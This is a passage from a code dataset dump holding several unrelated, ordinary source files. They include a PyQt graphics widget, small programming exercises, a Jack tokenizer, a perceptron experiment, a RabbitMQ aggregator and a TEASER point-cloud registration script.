self.theImageFromFile = pImage\n self.theBackgroundNameFromFile = pText\n # update the appearance of the Control Panel buttons for background selection:\n self.windowPIFControlPanel.updateBackgroundImageButtons(pText, pImage)\n \n \n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for handling changing size of graphics scene rectangle:\n # ------------------------------------------------------------\n def updateSceneRectSize(self):\n \n # emit a signal to update scene size GUI controls:\n \n lDict = { \\\n 0: str(int(self.scene.width())), \\\n 1: str(int(self.scene.height())), \\\n # the depth() function is not part of QGraphicsScene, we add it for completeness:\n 2: str(int(self.scene.depth())), \\\n 3: str(self.scene.mySceneUnits) \\\n }\n\n\n # this crashes on Linux!!!\"\n CDConstants.printOut(\" TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO \", CDConstants.DebugTODO )\n # although version PIF Generator 1.2.1 works?!?! And it also displays the table correctly!!!!\n self.scene.signalThatSceneResized.emit(lDict)\n # version Ubuntu 10.04 LTS the Lucid Linux released April 2010\n # default Python is 2.6.5\n # has installed Qt 4.6.2\n # has installed PyQt 263938\n CDConstants.printOut(\" TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO \", CDConstants.DebugTODO )\n\n\n # self.sceneWidthLabel.setText(str(int(self.scene.width())))\n # self.sceneHeightLabel.setText(str(int(self.scene.height())))\n # self.sceneDepthLabel.setText(str(int(self.scene.depth())))\n # self.sceneUnitsLabel.setText(str(self.scene.mySceneUnits))\n\n lText = \"\"\n buttons = self.theButtonGroupForBackgrounds.buttons()\n for myButton in buttons:\n if myButton.isChecked() == True:\n lText = myButton.text()\n # CDConstants.printOut( \" \"+str( \"myButton.text() =\", myButton.text() )+\" \", CDConstants.DebugTODO )\n \n self.updateSceneBackgroundImage(lText)\n\n# if self.theImageNameFromFile is \"BlankBackground\":\n# lBoringPixMap = QtGui.QPixmap(int(self.scene.width()), int(self.scene.height()))\n# lBoringPixMap.fill( QtGui.QColor(QtCore.Qt.white) )\n# self.theImageFromFile = QtGui.QImage(lBoringPixMap)\n# self.updateBackgroundImage(self.theImageNameFromFile, self.theImageFromFile)\n \n\n\n\n# 2011 - Mitja: uncomment createPixmapCellWidget to use pixmap items in Cell Scene:\n#\n# # ------------------------------------------------------------\n# # 2010 - Mitja: add code for handling insertion of pixmap items:\n# # ------------------------------------------------------------\n# def createPixmapCellWidget(self, pText) : # was: , pPixmap):\n#\n# # 2010 - Mitja: if there is no pixmap yet, make it a simple boring one:\n# lBoringPixMap = QtGui.QPixmap(128, 128)\n# lBoringPixMap.fill( QtGui.QColor(QtCore.Qt.darkGray) )\n# lPixmap = lBoringPixMap\n# item = DiagramPixmapItem(lPixmap, self.editMenu)\n# icon = QtGui.QIcon(item.pixmapForIconFromPolygon())\n#\n# button = QtGui.QToolButton()\n# button.setIcon(icon)\n# button.setIconSize(QtCore.QSize(50, 50))\n# button.setCheckable(True)\n# self.theButtonGroupForRegionShapes.addButton(button)\n#\n# layout = QtGui.QGridLayout()\n# layout.setMargin(2)\n# layout.addWidget(button, 0, 0, QtCore.Qt.AlignHCenter)\n# layout.addWidget(QtGui.QLabel(pText), 1, 0, QtCore.Qt.AlignCenter)\n#\n# widget = QtGui.QWidget()\n# widget.setLayout(layout)\n#\n# return widget\n\n\n\n def createColorToolButtonIcon(self, imageFile, color):\n pixmap = QtGui.QPixmap(50, 80)\n pixmap.fill(QtCore.Qt.transparent)\n painter = QtGui.QPainter(pixmap)\n lImage = QtGui.QPixmap(imageFile)\n target = QtCore.QRect(0, 0, 50, 60)\n source = QtCore.QRect(0, 0, 42, 42)\n painter.fillRect(QtCore.QRect(0, 60, 50, 80), color)\n painter.drawPixmap(target, lImage, source)\n painter.end()\n\n return QtGui.QIcon(pixmap)\n\n\n\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\nif __name__ == '__main__':\n\n import sys\n\n app = QtGui.QApplication(sys.argv)\n\n\n mainWindow = QtGui.QMainWindow()\n mainWindow.setGeometry(100, 100, 900, 500)\n\n mainWidget = CDDiagramSceneMainWidget(mainWindow)\n # mainWidget.setGeometry(100, 100, 900, 500)\n \n mainWindow.setCentralWidget(mainWidget)\n\n # 2010 - Mitja: QMainWindow.raise_() must be called after QMainWindow.show()\n # otherwise the PyQt/Qt-based GUI won't receive foreground focus.\n # It's a workaround for a well-known bug caused by PyQt/Qt on Mac OS X\n # as shown here:\n # http://www.riverbankcomputing.com/pipermail/pyqt/2009-September/024509.html\n mainWindow.raise_()\n mainWindow.show()\n\n sys.exit(app.exec_())\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\n\n# Local Variables:\n# coding: US-ASCII\n# End:\n","sub_path":"CellDraw/1.5.2/src/cdDiagramScene.py","file_name":"cdDiagramScene.py","file_ext":"py","file_size_in_byte":195450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"608506426","text":"'''\nDobrando valores de uma lista através de uma função.\n'''\n\ndef dobrar(lista):\n for c, v in enumerate(lista):\n lista[c] = v *2\n #não retorna nada\n\n\nvalores = [7, 5, 3, 9]\nprint(valores)\ndobrar(valores)\n#mesmo sem o retorno da função, a lista foi modificada\nprint(valores)\n","sub_path":"exercicio_py/ex0077_dobra_valor_lista.py","file_name":"ex0077_dobra_valor_lista.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224894369","text":"#!/usr/bin/python3\n# coding: utf-8\n\nimport sys, os, glob\nimport JackTokenizer as jt\nimport CompilationEngine as ce\n\ndef main():\n path = sys.argv[1]\n\n if os.path.isfile(path):\n file_list = [sys.argv[1]]\n else:\n if path[-1] != '/':\n path = path + '/'\n file_list = glob.glob(path + '*.jack')\n\n for input_file in file_list:\n j = jt.JackTokenizer(input_file)\n output_file = input_file.replace('.jack', 'T.xml')\n fout = open(output_file, 'wt')\n\n fout.write('' + '\\n')\n\n while j.hasMoreTokens():\n while j.token_list:\n j.advance()\n if j.tokenType() == jt.KEYWORD:\n key = [k for k, v in jt.keyword_dict.items() if v == j.keyWord()][0]\n fout.write(' ' + key + ' ' + '\\n')\n elif j.tokenType() == jt.SYMBOL:\n fout.write(' ' + j.symbol() + ' ' + '\\n')\n elif j.tokenType() == jt.IDENTIFIER:\n fout.write(' ' + j.identifier() + ' ' + '\\n')\n elif j.tokenType() == jt.INT_CONST:\n fout.write(' ' + str(j.intVal()) + ' ' + '\\n')\n elif j.tokenType() == jt.STRING_CONST:\n fout.write(' ' + j.stringVal() + ' ' + '\\n')\n\n fout.write('' + '\\n')\n\n j.f.close()\n fout.close()\n\nif __name__=='__main__':\n main()\n","sub_path":"10/JackAnalyzer_forPhase1.py","file_name":"JackAnalyzer_forPhase1.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"625927334","text":"# -*- coding:utf-8 -*-\n\"\"\"\n15,输入两棵二叉树A,B,判断B是不是A的子结构。(ps:我们约定空树不是任意一个树的子结构)\n思路)\n1)遍历二叉树寻找节点相同的点\n2)找到以后立刻停止怎么搞,return并不代表递归break if not res: 才可以控制找到就补在遍历\n3)res要分三种情况取值\n\n\"\"\"\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n def HasSubtree(self, pRoot1, pRoot2):\n # write code here\n if pRoot1==None or pRoot2==None:\n return False\n res=False\n if pRoot1.val==pRoot2.val:\n res =self.jude(pRoot1,pRoot2)\n if not res:\n res=self.HasSubtree(pRoot1.left,pRoot2) or self.HasSubtree(pRoot1.right,pRoot2)\n return res\n\n def jude(self,a,b):\n if b==None:\n return True\n if a==None :\n return False\n if a.val!=b.val :\n return False\n return self.jude(a.left,b.left) and self.jude(a.right,b.right)","sub_path":"DataStruct/have_sub_tree.py","file_name":"have_sub_tree.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"651744981","text":"# B\nN = int(input())\nA = list(map(int, input().split()))\n\nodd = 0\neven = 0\nfor i in range(N):\n if A[i] % 2 == 0:\n even += 1\n else:\n odd += 1\n\nans = 3 ** N - 2 ** even\nprint(ans)","sub_path":"AtCoder_Python/other_contest/CODE_FESTIVAL_2017_qual_C/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323162896","text":"import pickle\n\nfrom flask import Blueprint, abort\n\nfrom server import cache\n\nget_token_data = Blueprint(\"get_token_data\", __name__)\n\n\n@get_token_data.route(\"/\", methods=[\"GET\"])\ndef get_token(token):\n token = str(token)\n if token not in cache:\n abort(404)\n\n obj = pickle.loads(cache[token])\n return obj[\"path\"]\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45387149","text":"\"\"\"\r\nNNCI Project 1\r\nAuthor: Ashwin Vaidya, S3911888\r\nAuthor: Hari Vidharth, S4031180\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nplt.style.use(\"ggplot\")\r\nCValues = [0]\r\nCValuesNValuesVsQls = {}\r\nNValues = [50, 100, 200]\r\nRandomDatasetsNd = 100\r\nMeanMu = 0\r\nStandardDeviationSigma = 1\r\nEpochsNmax = 1000\r\nPlotAlphaValues = []\r\ny = []\r\n\r\nfor CValue in CValues:\r\n C = CValue\r\n print(\"C Value {0}/{1}\".format(C, CValues[-1]))\r\n NValuesVsQls = {}\r\n for NValue in NValues:\r\n N = NValue\r\n print(\"N Value {0}/{1}\".format(N, NValues[-1]))\r\n Qls = []\r\n Alpha = 0.0\r\n for AlphaValue in range(0, 20):\r\n Alpha += 0.25\r\n print(\"Alpha Value {0}\".format(Alpha), end=\"\\r\")\r\n AccuracyValues = []\r\n for Dataset in range(0, RandomDatasetsNd):\r\n print(\"Dataset {0}/{1}\".format(Dataset + 1, RandomDatasetsNd), end=\"\\r\")\r\n P = int(Alpha * N)\r\n X = np.random.normal(MeanMu, StandardDeviationSigma, (P, N))\r\n Y = np.random.choice([-1, +1], size=(P, 1), p=[1/2, 1/2])\r\n W = np.zeros((1, N))\r\n for Epoch in range(0, EpochsNmax):\r\n print(\"Epoch {0}/{1}\".format(Epoch + 1, EpochsNmax), end=\"\\r\")\r\n LocalPotentialEValues = []\r\n for Location, Feature in enumerate(X):\r\n LocalPotentialE = np.dot(W, Feature) * Y[Location]\r\n if LocalPotentialE[0] <= C:\r\n W = W + ((1 / N) * Feature * Y[Location])\r\n LocalPotentialEValues.append(LocalPotentialE[0])\r\n if np.min(LocalPotentialEValues) > 0:\r\n break\r\n CorrectlyClassified = 0.0\r\n for Location, Feature in enumerate(X):\r\n if np.sign(np.dot(W, Feature)) == Y[Location]:\r\n CorrectlyClassified += 1.0\r\n Accuracy = CorrectlyClassified/P\r\n AccuracyValues.append(Accuracy)\r\n LinearSeparability = 0.0\r\n for Location, AccuracyValue in enumerate(AccuracyValues):\r\n if AccuracyValue == 1.0:\r\n LinearSeparability += 1.0\r\n FinalAccuracy = LinearSeparability / len(AccuracyValues)\r\n Qls.append(FinalAccuracy)\r\n NValuesVsQls[N] = Qls\r\n CValuesNValuesVsQls[C] = NValuesVsQls\r\n\r\nprint(CValuesNValuesVsQls)\r\n\r\nAlpha = 0.0\r\nfor Value in range(0, 20):\r\n Alpha += 0.25\r\n PlotAlphaValues.append(Alpha)\r\n\r\nfor Items, Values in CValuesNValuesVsQls.items():\r\n for Item, Value in Values.items():\r\n y.append(Value)\r\n\r\nplt.figure(0)\r\nplt.plot(PlotAlphaValues, y[0], \"-r\", label=\"N = 50\")\r\nplt.plot(PlotAlphaValues, y[1], \"-g\", label=\"N = 100\")\r\nplt.plot(PlotAlphaValues, y[2], \"-b\", label=\"N = 200\")\r\nplt.xlabel(\"Alpha Values\")\r\nplt.ylabel(\"Ql.s.\")\r\nplt.title(\"Ql.s. of Linearly Separable Functions vs Alpha\")\r\nplt.legend(loc=\"upper right\")\r\nplt.show()\r\n\r\n\"\"\"\r\nplt.figure(1)\r\nplt.plot(PlotAlphaValues, y[3], \"-r\", label=\"N = 50\")\r\nplt.plot(PlotAlphaValues, y[4], \"-g\", label=\"N = 100\")\r\nplt.plot(PlotAlphaValues, y[5], \"-b\", label=\"N = 200\")\r\nplt.xlabel(\"Alpha Values\")\r\nplt.ylabel(\"Ql.s.\")\r\nplt.title(\"Ql.s. of Linearly Separable Functions vs Alpha\")\r\nplt.legend(loc=\"upper right\")\r\n\"\"\"\r\n","sub_path":"RB_2.py","file_name":"RB_2.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"327515344","text":"import random, os, pickle, trial_constants\n\nos.chdir('/Users/daisy/Desktop/proj/eyeballs/experiments/eyetracking/dl_exp/code/')\nprint(os.getcwd())\n\ndef order_trials(trials_list, current_list):\n\n\tdef get_trial_list(trials_list, current_list):\n\t\twith open(trials_list, mode = \"rb\") as fileObj:\n\t\t\tall_lists_all_trials = pickle.load(fileObj)\n\t\tall_trials = [x for x in all_lists_all_trials if x.list == current_list]\n\t\trandom.shuffle(all_trials)\n\t\treturn all_trials\n\n\tdef initial_trials(all_trials):\n\t\t# here we make two initial trials that use audios that dont appear elsewhere, so participants get familirized w. the paradigm\n\t\t# we randomize the order of the audio files, and the control-type trials they appear with (ie either T,T or V,V)\n\t\tinitial_trial1 = trial_constants.Trial(index = 0, list = current_list, criticality = 'INITIAL_TWO_TRIALS')\n\t\tinitial_trial2 = trial_constants.Trial(index = 1, list = current_list, criticality = 'INITIAL_TWO_TRIALS')\n\t\tfiller_type = ['T', 'V']\n\t\taudios = ['dh_AM_basketball_game_p1_CA3_CA48_p3_GA1_NY2.wav', 'hrt_AM_golf_game_p1_GA1_CA45_p3_GA3_CA2.wav']\n\t\trandom.shuffle(filler_type)\n\t\trandom.shuffle(audios)\n\n\t\tinitial_trial1.img_left_type = filler_type.pop()\n\t\tinitial_trial1.img_right_type = initial_trial1.img_left_type\n\n\t\tinitial_trial2.img_left_type = filler_type.pop()\n\t\tinitial_trial2.img_right_type = initial_trial2.img_left_type\n\n\t\tinitial_trial1.audio = audios.pop()\n\t\tinitial_trial2.audio = audios.pop()\n\n\t\tall_trials.append(initial_trial1)\n\t\tall_trials.append(initial_trial2)\n\t\treturn all_trials\n\n\n\tdef order_crits_and_fillers(all_trials):\n\t\t# assign random index to each twin (i.e., each filler)\n\t\ttwindices = random.sample(range(2, 10000), 12)\n\t\trandom_used = twindices # (keep track of used indices)\n\t\tfor trial in all_trials:\n\t\t\tif trial.criticality == 'FILLER':\n\t\t\t\ttrial.index = twindices.pop()\n\n\t\t# now assign each crit a random index that is lower than that of its twin\n\t\t# this is to ensure the twin comes after the crit\n\t\tfor trial in all_trials:\n\t\t\tif trial.criticality == 'CRITICAL':\n\t\t\t\tif trial.audio.startswith('neut'):\n\t\t\t\t\tcrit_stim = (' ').join(trial.audio.split('_')[2:-5])\n\t\t\t\telse:\n\t\t\t\t\tcrit_stim = (' ').join(trial.audio.split('_')[2:-6])\n\n\t\t\t\tfor twintrial in all_trials:\n\t\t\t\t\tif twintrial.criticality == 'FILLER':\n\t\t\t\t\t\tif twintrial.audio.startswith('neut'):\n\t\t\t\t\t\t\ttwin_stim = (' ').join(twintrial.audio.split('_')[2:-5])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttwin_stim = (' ').join(twintrial.audio.split('_')[2:-6])\n\t\t\t\t\t\tif twin_stim == crit_stim:\n\t\t\t\t\t\t\ttwindex = twintrial.index\n\t\t\t\t\t\t\tcrindex = None\n\t\t\t\t\t\t\twhile crindex in random_used or crindex is None:\n\t\t\t\t\t\t\t\tcrindex = random.randint(2, twindex)\n\t\t\t\t\t\t\ttrial.index = crindex\n\t\t\t\t\t\t\trandom_used.append(crindex)\n\t\treturn all_trials\n\n\tdef ensure_no_neigbors(all_trials):\n\t\t# check how many neighbors there are.\n\t\t# if neighbors > 0, we run all of order_trials again until neighbors == 0. loop is called outside the order_trials function\n\t\tall_trials.sort(key=lambda x: x.index)\n\t\tsame_neighbor_count = 0\n\t\tfor i in range(len(all_trials)-2):\n\t\t\tif all_trials[i].audio == all_trials[i+1].audio or all_trials[i].audio == all_trials[i+2].audio:\n\t\t\t\tsame_neighbor_count += 1\n\t\treturn same_neighbor_count\n\n\n\tall_trials = get_trial_list(trials_list, current_list)\n\tall_trials = initial_trials(all_trials)\n\tall_trials = order_crits_and_fillers(all_trials)\n\tsame_neighbor_count = ensure_no_neigbors(all_trials)\n\treturn same_neighbor_count, all_trials\n\t#\n\t#\n\t# def add_fillers(all_trials, random_used):\n\t# \t# now we have crits and twins in place, need to randomly assign fillers\n\t# \tfor trial in all_trials:\n\t# \t\tif trial.criticality == 'FILLER' and trial.index == None:\n\t# \t\t\tfindex = None\n\t# \t\t\twhile findex in random_used or findex is None:\n\t# \t\t\t\tfindex = random.randint(min(random_used), 10000) #starting at min(random_used) rather than 2 to reduce risk of neighbors, as 0,1, are fillers\n\t# \t\t\ttrial.index = findex\n\t# \treturn all_trials\n\t#\n\t#\n\t# def ensure_no_neigbors(all_trials):\n\t# \t# check how many neighbors there are.\n\t# \t# in practice, if neighbors > 0, we run all of order_trials again until neighbors == 0\n\t# \tall_trials.sort(key=lambda x: x.index)\n\t# \tsame_neighbor_count = 0\n\t# \tfor i in range(len(all_trials)-2):\n\t# \t\tif all_trials[i].audio == all_trials[i+1].audio or all_trials[i].audio == all_trials[i+2].audio:\n\t# \t\t\tsame_neighbor_count += 1\n\t# \tprint(same_neighbor_count)\n\t# \treturn same_neighbor_count\n\t#\n\t# all_trials = get_trial_list(trials_list, current_list)\n\t# all_trials = assign_initial_trials(all_trials)\n\t# all_trials, random_used = assign_crits_and_twins(all_trials)\n\t# all_trials = add_fillers(all_trials, random_used)\n\t# same_neighbor_count = ensure_no_neigbors(all_trials)\n\t#\n\t# return same_neighbor_count, all_trials\n\n\ncurrent_list = '1'\n## get list of audios w criticality\nwhile True:\n\tsame_neighbor_count, all_trials = order_trials('trials/trial_lists.obj', current_list)\n\tif same_neighbor_count == 0:\n\t\tbreak\n#\nfor t in all_trials:\n\tprint(t.audio + ' ' + t.criticality + ' '+ t.img_left_type + ' '+ t.img_right_type+ ' ' + str(t.index))\n","sub_path":"experiments/eyetracking/exp_1/code/scratch/SCRATCH_order_trials.py","file_name":"SCRATCH_order_trials.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"151538080","text":"import os\nimport json\nimport time\nimport pika\n\nrate = 100\nresultList = []\nnum_banks = 0\nqouteListCount = 0\n\ndef main():\n bind_exchange()\n connect_recipientList()\n\n\ndef bind_exchange():\n global channel2\n connection2 = pika.BlockingConnection(pika.ConnectionParameters('datdb.cphbusiness.dk'))\n channel2 = connection2.channel()\n\n channel2.exchange_declare(exchange='g1.aggregator',\n exchange_type='direct')\n\n channel2.queue_declare(queue='g1.aggr')\n\n\n channel2.queue_bind(exchange='g1.aggregator',\n routing_key='toAggregator',\n queue='g1.aggr')\n\n\ndef connect_recipientList():\n connection = pika.BlockingConnection(pika.ConnectionParameters('datdb.cphbusiness.dk'))\n channel = connection.channel()\n\n channel.exchange_declare(exchange='g1.queue.aggregator', exchange_type='direct')\n\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n\n channel.queue_bind(exchange='g1.queue.aggregator',\n routing_key='recipientList',\n queue=queue_name)\n\n print(' [*] Waiting for logs recipientlist. To exit press CTRL+C')\n\n channel.basic_consume(callback_recipientList,\n queue=queue_name)\n\n channel.start_consuming()\n\ndef callback_recipientList(ch, method, properties, body):\n global num_banks\n print(body)\n body = body.decode('utf-8')\n load = json.loads(body)\n print(load)\n num_banks = load['num_banks']\n ch.basic_ack(delivery_tag = method.delivery_tag)\n connect_normalizer()\n\ndef connect_normalizer():\n global channel2\n\n print(' [*] Waiting for logs normalizer. To exit press CTRL+C')\n\n channel2.basic_consume(callback_normalizer,\n queue='g1.aggr')\n\n channel2.start_consuming()\n\ndef callback_normalizer(ch, method, properties, body):\n ch.basic_ack(delivery_tag = method.delivery_tag)\n global resultList\n print(\"normalier, received\", body)\n jsonList(json.loads(body))\n print(\"num_banks: \", num_banks, \", resultlist: \", len(resultList))\n if (num_banks == len(resultList)):\n print(\"quoting\")\n bestQuote()\n ch.stop_consuming()\n reset_data()\n\ndef reset_data():\n global rate\n global resultList\n global num_banks\n global qouteListCount\n rate = 100\n resultList = []\n num_banks = 0\n qouteListCount = 0\n\ndef jsonList(input):\n print('jsonList() DEF', input)\n global resultList\n resultList.append(input)\n return resultList\n\ndef bestQuote():\n global rate\n #global finalResultList\n global resultList\n global qouteListCount\n for position in resultList:\n qouteListCount += 1\n if isinstance(position, dict):\n position = json.dumps(position)\n load = json.loads(position)\n currentInterestRate = float(load[\"interestRate\"])\n if currentInterestRate <= rate:\n #if currentInterestRate == rate: /////// Hvad hvis to har samme interestrate\n #rate = currentInterestRate\n #ssn = load[\"ssn\"]\n #finalResultList.append('{\"interestRate\":' + str(rate) + ', \"ssn\":' + str(ssn) + '}')\n #else:\n rate = currentInterestRate\n ssn = load[\"ssn\"]\n #if len(finalResultList) != 0 and qouteListCount == len(resultList):\n # for position in finalResultList:\n # print(position)\n # return finalResultList\n if qouteListCount == len(resultList):\n #finalResultList\n print('{\"interestRate\":' + str(rate) + ', \"ssn\":' + str(ssn) + '}')\n return '{\"interestRate\":' + str(rate) + ', \"ssn\":' + str(ssn) + '}'\n\nif __name__ == '__main__':\n main()\n","sub_path":"LB_Aggregator/aggregator.py","file_name":"aggregator.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184291901","text":"# use brute-force correspondences to register 3D Match training data\n# enumerate all possible pairs of the training data\n# use TEASER only, no RANSAC\nimport os\nimport numpy as np\nimport open3d as o3d\nimport teaserpp_python\nimport time\nimport scipy.io\nfrom helpers import *\n\n# hyper parameters\nALL_ALL_CORR_LIMIT = 20000 # upper limit for all-to-all correspondences\nNOISE_BOUND = 0.1\nVOXEL_SIZE_INIT = 0.5\nVOXEL_SIZE_STEP = 0.05\nICP_TH = 0.05\nICP_MAXITERS = 1000\nTIM_INLIER_RATIO_TH = 0.8\nRANSAC_MAXITERS_LOW = int(1e5)\nRANSAC_MAXITERS_HIGH = int(1e6) # run RANSAC one million times\n\n# obtain all training pairs in the training data\nthreedmatch_path = '../../Datasets/threedmatch'\npairs_all, pairs_30, pairs_50, pairs_70 = \\\n get3DMatchTrainPairs(threedmatch_path)\n\n# choose the catagory of pairs to register\npairs_register = [pairs_70[1136]]\n\n# start registering\n# GT transformation (A and B are already registered)\nR_gt = np.diag([1.0,1.0,1.0])\nt_gt = np.zeros(3)\nnrPairs = len(pairs_register)\nprint(f'Total number of pairs to register: {nrPairs}.')\n# things to log:\n# overlap rate 1\n# R_err_teaser, t_err_teaser 2\n# R_err_icp_teaser, t_err_icp_teaser 2\n# teaser_tim_inlier_rate 1\n# teaser_best_subopt 1\n# teaser_nrMCInliers 1\n# fitness_teaser, fitness_icp_teaser 2\nlog_results = np.zeros((nrPairs,1+2+2+1+1+1+2))\nfor pair_idx, pair in enumerate(pairs_register):\n A_path = pair[0]\n B_path = pair[1]\n overlap = float(pair[2])\n print(f'Register pair {pair_idx}: {A_path} and {B_path}, overlap: {overlap}.')\n\n # load the point clouds from .npz files\n cloudA = np.load(os.path.join(threedmatch_path,A_path))\n cloudB = np.load(os.path.join(threedmatch_path,B_path))\n A_xyz = cloudA['pcd']\n A_rgb = cloudA['color']\n B_xyz = cloudB['pcd']\n B_rgb = cloudB['color']\n print(f'Before downsample: # of points in A: {A_xyz.shape[0]}, # of points in B: {B_xyz.shape[0]}.')\n A_pcd = o3d.geometry.PointCloud()\n B_pcd = o3d.geometry.PointCloud()\n A_pcd.points = o3d.utility.Vector3dVector(A_xyz)\n A_pcd.colors = o3d.utility.Vector3dVector(A_rgb)\n B_pcd.points = o3d.utility.Vector3dVector(B_xyz)\n B_pcd.colors = o3d.utility.Vector3dVector(B_rgb)\n\n\n # downsample A and B until number of points is small enough\n N = 2*ALL_ALL_CORR_LIMIT\n VOXEL_SIZE = VOXEL_SIZE_INIT - VOXEL_SIZE_STEP\n while N > ALL_ALL_CORR_LIMIT:\n VOXEL_SIZE = VOXEL_SIZE + VOXEL_SIZE_STEP\n A_pcd_ds = A_pcd.voxel_down_sample(voxel_size=VOXEL_SIZE)\n B_pcd_ds = B_pcd.voxel_down_sample(voxel_size=VOXEL_SIZE)\n A_ds_xyz = np.asarray(A_pcd_ds.points)\n B_ds_xyz = np.asarray(B_pcd_ds.points)\n NA = A_ds_xyz.shape[0]\n NB = B_ds_xyz.shape[0]\n N = NA * NB\n print(f'After downsample with voxel size {VOXEL_SIZE}: # of points in A: {NA}, # of points in B: {NB}, all-to-all corrs: {N}.')\n\n # create an all-to-all correspondence set\n A_ds_xyz = A_ds_xyz.T # shape 3 by NA\n B_ds_xyz = B_ds_xyz.T # shape 3 by NB\n A_corr = np.repeat(A_ds_xyz,NB,axis=1)\n B_corr = np.tile(B_ds_xyz,(1,NA))\n assert (A_corr.shape[1] == N) and (B_corr.shape[1]), 'A_corr and B_corr wrong dimension'\n print(f'Created {N} all-to-all correspondences.')\n\n # use TEASER to register\n # create a TEASER solver\n solver_params = teaserpp_python.RobustRegistrationSolver.Params()\n solver_params.cbar2 = 1.0\n solver_params.noise_bound = NOISE_BOUND\n solver_params.estimate_scaling = False\n solver_params.rotation_tim_graph = teaserpp_python.RobustRegistrationSolver.INLIER_GRAPH_FORMULATION.CHAIN\n # solver_params.rotation_tim_graph = teaserpp_python.RobustRegistrationSolver.INLIER_GRAPH_FORMULATION.COMPLETE\n solver_params.rotation_estimation_algorithm = teaserpp_python.RobustRegistrationSolver.ROTATION_ESTIMATION_ALGORITHM.GNC_TLS\n solver_params.rotation_gnc_factor = 1.4\n solver_params.rotation_max_iterations = 10000\n solver_params.rotation_cost_threshold = 1e-16\n solver = teaserpp_python.RobustRegistrationSolver(solver_params)\n solver.solve(A_corr,B_corr)\n solution = solver.getSolution()\n R_teaser = solution.rotation\n t_teaser = solution.translation\n teaser_T = Rt2T(R_teaser,t_teaser)\n # obtain number of inliers survived maximum clique\n teaser_nrMCInliers = len(solver.getInlierMaxClique())\n\n fitness_teaser = computeFitnessScore(A_pcd_ds,B_pcd_ds,NOISE_BOUND,teaser_T)\n # certify TEASER's result (rotation part)\n A_TIMs = solver.getMaxCliqueSrcTIMs()\n B_TIMs = solver.getMaxCliqueDstTIMs()\n theta_TIMs_raw = solver.getRotationInliersMask()\n nrRotationInliers = np.sum(theta_TIMs_raw)\n theta_TIMs = getBinaryTheta(theta_TIMs_raw)\n certifier_params = teaserpp_python.DRSCertifier.Params()\n certifier_params.cbar2 = 1.0\n certifier_params.noise_bound = 2*NOISE_BOUND\n certifier_params.sub_optimality = 1e-3\n certifier_params.max_iterations = 1e3\n certifier_params.gamma_tau = 2.0\n certifier = teaserpp_python.DRSCertifier(certifier_params)\n certificate = certifier.certify(R_teaser,A_TIMs,B_TIMs,theta_TIMs)\n teaser_best_subopt = certificate.best_suboptimality\n\n # compute pose error of TEASER\n teaser_tim_inlier_ratio = float(nrRotationInliers)/float(A_TIMs.shape[1])\n R_err_teaser = getRotationError(R_gt,R_teaser)\n t_err_teaser = getTranslationError(t_gt,t_teaser)\n print(f'TEASER: R_err: {R_err_teaser}[deg], t_err: {t_err_teaser}[m], fitness: {fitness_teaser}, tim_inlier_ratio: {teaser_tim_inlier_ratio}, best_subopt: {teaser_best_subopt}.')\n\n # refine with ICP after TEASER\n trans_init = np.identity(4)\n trans_init[:3,:3] = R_teaser\n trans_init[:3,3] = t_teaser\n icp_sol = o3d.registration.registration_icp(\n A_pcd, B_pcd, ICP_TH, trans_init,\n o3d.registration.TransformationEstimationPointToPoint(),\n o3d.registration.ICPConvergenceCriteria(max_iteration=ICP_MAXITERS))\n fitness_icp_teaser = computeFitnessScore(A_pcd,B_pcd,ICP_TH,icp_sol.transformation)\n R_icp_teaser = icp_sol.transformation[:3,:3]\n t_icp_teaser = icp_sol.transformation[:3,3]\n R_err_icp_teaser = getRotationError(R_gt,R_icp_teaser)\n t_err_icp_teaser = getTranslationError(t_gt,t_icp_teaser)\n print(f'ICP-TEASER: R_err: {R_err_icp_teaser}[deg], t_err: {t_err_icp_teaser}[m], fitness: {fitness_icp_teaser}.')\n\n # log results\n log_results[pair_idx,:] = np.asarray([overlap,\n R_err_teaser,t_err_teaser,\n R_err_icp_teaser,t_err_icp_teaser,\n teaser_tim_inlier_ratio,\n teaser_best_subopt,\n teaser_nrMCInliers,\n fitness_teaser,\n fitness_icp_teaser])\n\n# np.savetxt('results/results_70_full.txt',log_results,fmt='%.5f',delimiter=',')","sub_path":"eval_teaser_only_threedmatch.py","file_name":"eval_teaser_only_threedmatch.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"87094956","text":"#!/usr/bin/python3 -u\n# -*- mode:python3; coding:utf-8; tab-width:4 -*-\n\nimport random\nimport numpy as np\n\nfrom .individual import Individual\n\n\nclass Recombination:\n def n_points_crossover(parent_1, parent_2, crossover_rate,\n points_number, offspring, recombination_index):\n 